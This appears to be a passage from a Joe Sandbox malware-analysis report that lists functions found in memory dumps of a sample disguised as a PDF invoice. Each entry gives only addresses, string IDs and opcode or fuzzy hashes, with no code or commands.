                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 881aa8838c26b4dad4abc90e502f0a24bfb72699e0f4169a638b05a0f3de8929
                                                                                      • Instruction ID: 7410d7969fb1e1b192d69f557a46f434bf4cbe93d27a729b30312c1d45460513
                                                                                      • Opcode Fuzzy Hash: 881aa8838c26b4dad4abc90e502f0a24bfb72699e0f4169a638b05a0f3de8929
                                                                                      • Instruction Fuzzy Hash: 7771F770A05218CFEBA0DF58D844BEAB7F2FB4A314F0041E9D549A7285D7368E95CF94
                                                                                      Function 065C2DD9 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: ed0865e09da278a5acae00f52a3a7983c03a19df614cc6d91122e073a14a5e7b
                                                                                      • Instruction ID: 1b5f68b64b09edac5a0166c17be713365abfb45e3ec705a3cba389ef434fb752
                                                                                      • Opcode Fuzzy Hash: ed0865e09da278a5acae00f52a3a7983c03a19df614cc6d91122e073a14a5e7b
                                                                                      • Instruction Fuzzy Hash: 34610270D0520ADFEB48CFE9D485BAEBBB2FB89310F108429E505A7351DB745A85CF90
                                                                                      Function 066A6B38 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 593194373e0db713fc9dd6b5983b06924fa79687e0b7230467e4abae62b6c329
                                                                                      • Instruction ID: e1ba6da81499303417dba5d880b4a8289dfc9b1ae52312dc9f273c2842c97eb2
                                                                                      • Opcode Fuzzy Hash: 593194373e0db713fc9dd6b5983b06924fa79687e0b7230467e4abae62b6c329
                                                                                      • Instruction Fuzzy Hash: 9D71E574E00218DFDB54EFA9D89469EBBB2FB89304F208069E819E7349DB305D95CF60
                                                                                      Function 066AB470 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: pwq
                                                                                      • API String ID: 0-3750715768
                                                                                      • Opcode ID: dcfb2d810db5c405dfdaab87a3e1a814b82ecb1cf978885a00b3e8e9a22ab5e7
                                                                                      • Instruction ID: e74f54894d12751d05e6f93df44e67f98d24eadc625780859c174b8a5cd8f06e
                                                                                      • Opcode Fuzzy Hash: dcfb2d810db5c405dfdaab87a3e1a814b82ecb1cf978885a00b3e8e9a22ab5e7
                                                                                      • Instruction Fuzzy Hash: 37514E76600104AFCB459FA8DC45D69BFB6FF8D31471A80D4E2098B372DA32DC22EB51
                                                                                      Function 067669F8 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq
                                                                                      • API String ID: 0-1062398946
                                                                                      • Opcode ID: 4f983908efdf1a5db09a4a82efc5eb593df0a3c4bec8881d69b3f802f10c01be
                                                                                      • Instruction ID: 8b5229dea76d969b60da93b058b48674d42bf84ff35f68d616cad14b86ce5395
                                                                                      • Opcode Fuzzy Hash: 4f983908efdf1a5db09a4a82efc5eb593df0a3c4bec8881d69b3f802f10c01be
                                                                                      • Instruction Fuzzy Hash: 6451B336604254AFCB469F69E844D697FB6EF89310B1980E6F605CF372CA32DC11DB61
                                                                                      Function 065C2DE8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: d722528a5549cc65c5eb41757490da46a383fd1a6c7e851e673dc9dd5a76d25f
                                                                                      • Instruction ID: 4024f748cd624288cd9f7cd365de7df97171658c8dc8971aad183311b12037e1
                                                                                      • Opcode Fuzzy Hash: d722528a5549cc65c5eb41757490da46a383fd1a6c7e851e673dc9dd5a76d25f
                                                                                      • Instruction Fuzzy Hash: 2851F170D0520ADFEB48CFE9D485BAEBBB2FB49320F109429E505B7360DB745A85CB90
                                                                                      Function 066AC430 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq
                                                                                      • API String ID: 0-1062398946
                                                                                      • Opcode ID: 8c28e43bba2d4552755d72d4b672033c0129510a44f6e0c244ef5beca74569f2
                                                                                      • Instruction ID: f568d654b2e7ad4313a737d2a97e20308f5e72370efd4a22aefb298bd642e951
                                                                                      • Opcode Fuzzy Hash: 8c28e43bba2d4552755d72d4b672033c0129510a44f6e0c244ef5beca74569f2
                                                                                      • Instruction Fuzzy Hash: 05519F71A006158FCB10DF68C884A6AFBB5FF8A320B158696E9259B381D730FC95CFD4
                                                                                      Function 066A6B28 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: b3c5a3d6f5842e08f4fd3f3ef98b49306e834ccf1b3bab376db846ca5a7f3edf
                                                                                      • Instruction ID: 1454378f74a23e07c3d703fda7ea1c6d626dc11a4273a5422420ebead0905f5c
                                                                                      • Opcode Fuzzy Hash: b3c5a3d6f5842e08f4fd3f3ef98b49306e834ccf1b3bab376db846ca5a7f3edf
                                                                                      • Instruction Fuzzy Hash: 3C61E774E00218DFDB54EFA9D89469EBBB2FB89304F208169E819E7349DB305D95CF60
                                                                                      Function 069B9C58 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 4cc461f6164799baaea2323535d51f8187a4abd0ed02fd07e85f106dde32b4d5
                                                                                      • Instruction ID: 12ba0457bbfa57619b320e385a0e57c4217fa7df6ad99265e9286be0e037d52c
                                                                                      • Opcode Fuzzy Hash: 4cc461f6164799baaea2323535d51f8187a4abd0ed02fd07e85f106dde32b4d5
                                                                                      • Instruction Fuzzy Hash: 16510170E10218CFDB84DFA9E9446EEBBF6FB8A300F10A42AD919A7754DB701945CF90
                                                                                      Function 065C1FBA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 675b168450c3f902d7b8f95d51b4a256f90afb40247f4a59f4b6703aceb660d1
                                                                                      • Instruction ID: b03828bff0f236b8e0bc5de150238ad7d8c8f01c0a61cf2d26fcc283c4c1fbb8
                                                                                      • Opcode Fuzzy Hash: 675b168450c3f902d7b8f95d51b4a256f90afb40247f4a59f4b6703aceb660d1
                                                                                      • Instruction Fuzzy Hash: 3E51F674A042088FDB94DFA8D454BAEBBF2FB49310F20402AD915AB385CB319D91CF61
                                                                                      Function 067659A8 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq
                                                                                      • API String ID: 0-1075809040
                                                                                      • Opcode ID: 58ebc18fc6e205c887852593b34759898d19f4ac5580379547c2f986d4a167d7
                                                                                      • Instruction ID: 103ca319c5f2fe0c8ba55a9ecb6abfa5f6e2f01415076e5ce8325e659d1d8b47
                                                                                      • Opcode Fuzzy Hash: 58ebc18fc6e205c887852593b34759898d19f4ac5580379547c2f986d4a167d7
                                                                                      • Instruction Fuzzy Hash: 4341A530B106148FCB85AB69C8A8A6DB7B7AFC8700F504419E917EB394CF709D45DB91
                                                                                      Function 069BF7A8 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: df3b21b125bbda8c042fbe937ebf6f25c382362c8cee7be16d2e8b688aa655a7
                                                                                      • Instruction ID: 1a709e2137cc29a26002d16b0e327b28ff7a9d10feaea165e93c7d68cadd540f
                                                                                      • Opcode Fuzzy Hash: df3b21b125bbda8c042fbe937ebf6f25c382362c8cee7be16d2e8b688aa655a7
                                                                                      • Instruction Fuzzy Hash: E7510474E002089FDB44EFAAE9846EDBBF6FB8A310F1090AAE415A7354DB745D45CF60
                                                                                      Function 065C1F11 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: a14386b9b5ee66d6800cec645b3fa8faba388c1325e1984cd179d8494f3a1ec8
                                                                                      • Instruction ID: 6a2cabf96259695d7f3724a6b88834342035f82809770ab29d507e983473367d
                                                                                      • Opcode Fuzzy Hash: a14386b9b5ee66d6800cec645b3fa8faba388c1325e1984cd179d8494f3a1ec8
                                                                                      • Instruction Fuzzy Hash: 6951F774A042088FDB94DFA8D554BADBBF2FB49310F20412AD919EB385DB319D91CF61
                                                                                      Function 065C1FD4 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: f43ff0ed4a1ff104f802b7f5f7dcd4628a3398918ed2d2618c00457ff2edc97a
                                                                                      • Instruction ID: 6eba8d58cf9dc1bb27efb40c74b9cb9ffb66042a6c95c1a78edb93c0bff352a8
                                                                                      • Opcode Fuzzy Hash: f43ff0ed4a1ff104f802b7f5f7dcd4628a3398918ed2d2618c00457ff2edc97a
                                                                                      • Instruction Fuzzy Hash: 2F511774A042088FDB94DFA8D454BADB7F2FB49310F20412AD91AEB395DB319D51CF60
                                                                                      Function 065C1F17 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 93f1cee151a4901ae67f53947bfce81857534ff4c290f1875ec18008d4a6b37d
                                                                                      • Instruction ID: 1dba2ba2beb2e8780a09f81e91304eda4de8dffdf42e73da2b770cb6a54817bc
                                                                                      • Opcode Fuzzy Hash: 93f1cee151a4901ae67f53947bfce81857534ff4c290f1875ec18008d4a6b37d
                                                                                      • Instruction Fuzzy Hash: 9A51F874A042089FDB94DFA8D454BADBBF2FB49310F20412AD919EB385DB319D51CF61
                                                                                      Function 065C1F60 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 8fe6c6be3f44d8762a2d3e467a942b213a6a62dd5ed8ebefcb58e69113984e98
                                                                                      • Instruction ID: d0220a48631fe535100834c2034104f0f7c884750343af1d040ff0c974789168
                                                                                      • Opcode Fuzzy Hash: 8fe6c6be3f44d8762a2d3e467a942b213a6a62dd5ed8ebefcb58e69113984e98
                                                                                      • Instruction Fuzzy Hash: 9B510774A042088FDB94DFA8D454BADB7F2FB49310F20402AD91AEB385DB319D91CF50
                                                                                      Function 065C1FB5 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 7854c82524973c22cb0ec2b2c19e1eaf9ce59cf884823824e89475f6e89329f2
                                                                                      • Instruction ID: d0220a48631fe535100834c2034104f0f7c884750343af1d040ff0c974789168
                                                                                      • Opcode Fuzzy Hash: 7854c82524973c22cb0ec2b2c19e1eaf9ce59cf884823824e89475f6e89329f2
                                                                                      • Instruction Fuzzy Hash: 9B510774A042088FDB94DFA8D454BADB7F2FB49310F20402AD91AEB385DB319D91CF50
                                                                                      Function 065C2008 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 3a6633787abc2aac9b66a3aa3326fef7d1fdffabf647c7377fa9a638a8a9ccd7
                                                                                      • Instruction ID: d0220a48631fe535100834c2034104f0f7c884750343af1d040ff0c974789168
                                                                                      • Opcode Fuzzy Hash: 3a6633787abc2aac9b66a3aa3326fef7d1fdffabf647c7377fa9a638a8a9ccd7
                                                                                      • Instruction Fuzzy Hash: 9B510774A042088FDB94DFA8D454BADB7F2FB49310F20402AD91AEB385DB319D91CF50
                                                                                      Function 065C21DF Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 7678982c5e6798e19bce326c84223f5b919749ab72ef2cd37a92e708adc28f91
                                                                                      • Instruction ID: ada772691c0422df7343abb6dc7958f6995caab8ef64ed8c4adb425326df8e90
                                                                                      • Opcode Fuzzy Hash: 7678982c5e6798e19bce326c84223f5b919749ab72ef2cd37a92e708adc28f91
                                                                                      • Instruction Fuzzy Hash: 9C510874A042088FDB94DFA8D454BADB7F2FB49310F20402AD91AEB385DB319D51CF50
                                                                                      Function 065C27B0 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: c7745b35f09f5717465885c66634197e8aad27d634fd9930cbc61f423d7a5427
                                                                                      • Instruction ID: f39c1d99c5c372ff306d0de19c18191d5715e3619549f6be9c8fa3c7433dc9ca
                                                                                      • Opcode Fuzzy Hash: c7745b35f09f5717465885c66634197e8aad27d634fd9930cbc61f423d7a5427
                                                                                      • Instruction Fuzzy Hash: 914114B0E062089FDB44CFA9D844BEEBBF6FB89310F108029E514B7255D7349A45CFA1
                                                                                      Function 06760D70 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'sq
                                                                                      • API String ID: 0-1075809040
                                                                                      • Opcode ID: 455fbd712717230452811c8849a32a22a13bf87b75fb381887f19f0c7c697307
                                                                                      • Instruction ID: 5a3e57ab85f83e6b1023f444e0b2167c0ab1e2fe452205b4eef2e6c29d8762d2
                                                                                      • Opcode Fuzzy Hash: 455fbd712717230452811c8849a32a22a13bf87b75fb381887f19f0c7c697307
                                                                                      • Instruction Fuzzy Hash: 4F31B5367001049FCB449F65E944DAEBBB6FFCC310B144069FA099B361CA31DC46DBA0
                                                                                      Function 065C27C0 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 16cdcb2070ce2f70f56e58570c496d6824e0922545a71d922445efd458b1cd74
                                                                                      • Instruction ID: 0c33b71c2f15226bcc59b18ed23d35a3e70e9723bb50e0c85dfd57e785473b56
                                                                                      • Opcode Fuzzy Hash: 16cdcb2070ce2f70f56e58570c496d6824e0922545a71d922445efd458b1cd74
                                                                                      • Instruction Fuzzy Hash: 90410470E052089FDB44DF99D844BEEBBF6FB89310F108429E519B7254D7349A45CFA1
                                                                                      Function 0676F0B8 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 61d19831987c26a3068f3b04865d1a80df304bcd09924dfdc61b2b1512bdc9bd
                                                                                      • Instruction ID: a7a192c287c18bbb16160fa535b9c7445ef4e461f5faccf58f2d061e5a514630
                                                                                      • Opcode Fuzzy Hash: 61d19831987c26a3068f3b04865d1a80df304bcd09924dfdc61b2b1512bdc9bd
                                                                                      • Instruction Fuzzy Hash: 77410AB4E052089FCB44CF99E894AEEBBF6EF49310F10806AE915A7351DB359D41CFA0
                                                                                      Function 066ABD20 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (wq
                                                                                      • API String ID: 0-1062398946
                                                                                      • Opcode ID: 3c9f42901636554009261015fec63469ed330d5c790e25520a0e59b39404fde9
                                                                                      • Instruction ID: c59f1ec9e3416d71f28a952471e308af42a6d8ee2addda3942f68d98577e6c9b
                                                                                      • Opcode Fuzzy Hash: 3c9f42901636554009261015fec63469ed330d5c790e25520a0e59b39404fde9
                                                                                      • Instruction Fuzzy Hash: D021E935704255AFDB155F69E8449AE7F56EFC9320B10407AFA09CB351DF719C11C7A0
                                                                                      Function 065C6930 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 21b0b893305b0133726944344ec0184e833dc6f5b128d44487dee8362224a39b
                                                                                      • Instruction ID: 9b3191169292da29662fdc89924e568124c8357fd4250270c9f0e4b87636de5d
                                                                                      • Opcode Fuzzy Hash: 21b0b893305b0133726944344ec0184e833dc6f5b128d44487dee8362224a39b
                                                                                      • Instruction Fuzzy Hash: E8318D74A05209AFCB44DFA8E845AEEBBF5FB89310F10856DE804A7341DB315E41CFA1
                                                                                      Function 0676F3D8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 36b473eaffe8ec9ffb53e9811ece19b8cf6789d14212968b3b1c0b53cd170ad0
                                                                                      • Instruction ID: 312a3fc160c3332510720df5d616634378bc02077f61d9d0e4371c2a279fe133
                                                                                      • Opcode Fuzzy Hash: 36b473eaffe8ec9ffb53e9811ece19b8cf6789d14212968b3b1c0b53cd170ad0
                                                                                      • Instruction Fuzzy Hash: 84312A74E052099FDB44DFAAE940AEEBBF6FB89300F109029E915E7341D7785A45CFA0
                                                                                      Function 065C030D Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 05270f64035042314f1c1f88944d43646a03e59e0edbeb2d963856e1c28e39d1
                                                                                      • Instruction ID: dfb7cf423063303f15b0949451eb9e471791c1754680e43ba82868e1256143b2
                                                                                      • Opcode Fuzzy Hash: 05270f64035042314f1c1f88944d43646a03e59e0edbeb2d963856e1c28e39d1
                                                                                      • Instruction Fuzzy Hash: 6741F174A15228CFEB60DF58E844BAABBB2FB4A714F0041E9D449A3385D7369E84CF51
                                                                                      Function 066A9268 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: xJ
                                                                                      • API String ID: 0-2400849553
                                                                                      • Opcode ID: 54ffe40b9ed32f7ef1eb50662d0831522034caa698ace2eed4a61ece25fe5eeb
                                                                                      • Instruction ID: 0c1d68d8412986ceebff0b209028b1901a29109589b236d2d218aa12f328b912
                                                                                      • Opcode Fuzzy Hash: 54ffe40b9ed32f7ef1eb50662d0831522034caa698ace2eed4a61ece25fe5eeb
